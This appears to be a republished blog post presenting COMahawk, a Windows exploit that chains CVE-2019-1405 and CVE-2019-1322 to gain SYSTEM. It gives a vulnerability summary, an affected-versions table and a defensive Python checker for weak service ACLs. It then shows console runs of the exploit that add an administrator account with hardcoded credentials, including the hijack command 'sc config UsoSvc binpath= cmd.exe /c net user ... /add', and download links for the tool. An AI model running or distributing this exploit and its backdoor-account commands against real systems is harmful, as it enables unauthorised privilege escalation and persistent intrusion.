Windows Privilege Escalation Tool: CVE-2019-1405 & CVE-2019-1322

Vulnerability Introduction

Two vulnerabilities discovered by NCC Group researchers allow privilege escalation through COM against a local service. The first, CVE-2019-1405, is a logic error in a COM service (the UPnP Device Host) that lets an ordinary local user execute arbitrary commands as the LOCAL SERVICE account. The second, CVE-2019-1322, is a simple service misconfiguration that lets any member of the SERVICE group reconfigure a service that runs as SYSTEM (this vulnerability was also found independently by other researchers). Chained together, the two let an ordinary local user execute arbitrary commands as SYSTEM.

A wider review of Windows services found that any process running as LOCAL SERVICE or NETWORK SERVICE can carry out the second step, and that includes the UPnP Device Host service mentioned above. As a result, any local user can chain CVE-2019-1405 with CVE-2019-1322 to elevate to SYSTEM on Windows 10 (1803 through 1903).
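The CVE-2019-1322 half of the chain is a service ACL problem: the exploit's `sc config UsoSvc binpath= ...` only works because the service's security descriptor granted SERVICE_CHANGE_CONFIG to a trustee that a LOCAL SERVICE process holds. As an added example (not code from the original post or from COMahawk), the Python below parses a service SDDL string, the form `sc.exe sdshow <service>` prints, and reports allow-ACEs that give low-privileged trustees such as NT AUTHORITY\SERVICE, Everyone or Authenticated Users rights that allow reconfiguring the service. The two sample descriptors are constructed for illustration, not captured from a real UsoSvc.

```python
"""Flag service ACEs that let a low-privileged trustee reconfigure the service.
Added example, not code from the original post or from COMahawk. Input is a
service security descriptor in SDDL form, the string `sc.exe sdshow <svc>` prints."""
import re
from typing import Dict, List, Tuple

# Two-letter SDDL right codes and their access-mask bits (service-specific, standard, generic).
RIGHT_BITS: Dict[str, int] = {
    "CC": 0x00000001,  # SERVICE_QUERY_CONFIG
    "DC": 0x00000002,  # SERVICE_CHANGE_CONFIG: enough to run `sc config <svc> binpath=`
    "LC": 0x00000004,  # SERVICE_QUERY_STATUS
    "SW": 0x00000008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00000010,  # SERVICE_START
    "WP": 0x00000020,  # SERVICE_STOP
    "DT": 0x00000040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x00000080,  # SERVICE_INTERROGATE
    "CR": 0x00000100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC: holder can grant itself DC
    "WO": 0x00080000,  # WRITE_OWNER: holder can take ownership, then WRITE_DAC
    "GA": 0x10000000,  # GENERIC_ALL
    "GW": 0x40000000,  # GENERIC_WRITE (includes SERVICE_CHANGE_CONFIG)
}
# Rights that give the holder control over what the service executes.
TAKEOVER_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}

# Trustee abbreviations that any process, or any service process, carries for free.
LOW_PRIV_TRUSTEES: Dict[str, str] = {
    "WD": "Everyone",               # as a trustee, WD is Everyone (S-1-1-0), not WRITE_DAC
    "AU": "Authenticated Users",
    "IU": "INTERACTIVE",
    "BU": "BUILTIN\\Users",
    "BG": "BUILTIN\\Guests",
    "AN": "ANONYMOUS LOGON",
    "SU": "NT AUTHORITY\\SERVICE",  # S-1-5-6: held by every LOCAL SERVICE / NETWORK SERVICE process
    "LS": "NT AUTHORITY\\LOCAL SERVICE",
    "NS": "NT AUTHORITY\\NETWORK SERVICE",
}

# ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")


def parse_rights(field: str) -> List[str]:
    """Split a rights field into two-letter codes; hex masks such as "0x20002" are decoded too."""
    field = field.strip()
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return [code for code, bit in RIGHT_BITS.items() if mask & bit]
    if len(field) % 2:
        raise ValueError(f"odd-length rights field: {field!r}")
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def dacl_of(sddl: str) -> str:
    """Return only the DACL ACEs (after 'D:' and its flags), so SACL entries are ignored."""
    m = re.search(r"D:(?:P|AI|AR)*((?:\([^()]*\))*)", sddl)
    return m.group(1) if m else ""


def find_weak_aces(sddl: str) -> List[Tuple[str, str, List[str]]]:
    """Return (trustee code, friendly name, takeover rights) for each dangerous allow-ACE."""
    findings = []
    for ace_type, _flags, rights, _obj, _inh_obj, trustee in ACE_RE.findall(dacl_of(sddl)):
        if ace_type != "A" or trustee not in LOW_PRIV_TRUSTEES:
            continue
        granted = sorted(set(parse_rights(rights)) & TAKEOVER_RIGHTS)
        if granted:
            findings.append((trustee, LOW_PRIV_TRUSTEES[trustee], granted))
    return findings


# Constructed sample descriptors (not captured from a real host). WEAK_SDDL gives
# NT AUTHORITY\SERVICE the DC right, the shape of misconfiguration that lets a
# LOCAL SERVICE process point a SYSTEM service's binPath at its own command.
WEAK_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCDCLCSWRPWPDTLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)
# The same descriptor with the SERVICE entry reduced to query/start/stop rights.
FIXED_SDDL = WEAK_SDDL.replace("(A;;CCDCLCSWRPWPDTLOCRRC;;;SU)", "(A;;CCLCSWRPWPDTLOCRRC;;;SU)")

if __name__ == "__main__":
    for label, sddl in (("constructed weak", WEAK_SDDL), ("constructed fixed", FIXED_SDDL)):
        hits = find_weak_aces(sddl)
        print(f"{label}: {'reconfigurable by a low-privileged trustee' if hits else 'ok'}")
        for code, name, rights in hits:
            print(f"  {name} ({code}) holds {', '.join(rights)}")
```

On a real host, run `sc.exe sdshow UsoSvc` and pass the printed string to `find_weak_aces`; an empty result means the DACL has no entry of the kind this chain depends on. Note that the code is careful about `WD`, which means WRITE_DAC in a rights field but Everyone in a trustee field, and that it skips the SACL (`S:`) and deny ACEs, which never grant anything.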

Affected versions

Vendor      Product                Versions
Microsoft   Windows 10             -, 1607, 1709, 1803, 1809, 1903
Microsoft   Windows 7              -
Microsoft   Windows 8.1            -
Microsoft   Windows RT 8.1         -
Microsoft   Windows Server 2008    -, R2
Microsoft   Windows Server 2012    -, R2
Microsoft   Windows Server 2016    -, 1803, 1903
Microsoft   Windows Server 2019    -

Default privilege escalation (no arguments)

C:\Users\null\Desktop>COMahawk64.exe
[\] Progress:  1/9 2/9 3/9 4/9 5/9 6/9 7/9 8/9 9/9
[+] Hopefully k8gege:K8gege520 is added as an admin.

C:\Users\null\Desktop>net user

User accounts for \\DESKTOP-3F42O5D

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
k8gege                   null                     WDAGUtilityAccount
The command completed successfully.

Running a specified command

C:\Users\null\Desktop>COMahawk64.exe "net user k8gege K8gege123? /add"
[+] Executing command [ sc config UsoSvc binpath= "cmd.exe /c net user k8gege K8gege123? /add" ]
[\] Progress:  1/6 2/6 3/6 4/6 5/6 6/6
[+] Command executed.
C:\Users\null\Desktop>net user

User accounts for \\DESKTOP-3F42O5D

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
k8gege                   null                     WDAGUtilityAccount
The command completed successfully.

Win10 privilege escalation

Tested on Win10 x64 1803

Exploit

https://github.com/apt69/COMahawk

https://github.com/k8gege/K8tools/raw/master/Comahawk.rar


Source: www.cnblogs.com/k8gege/p/12307400.html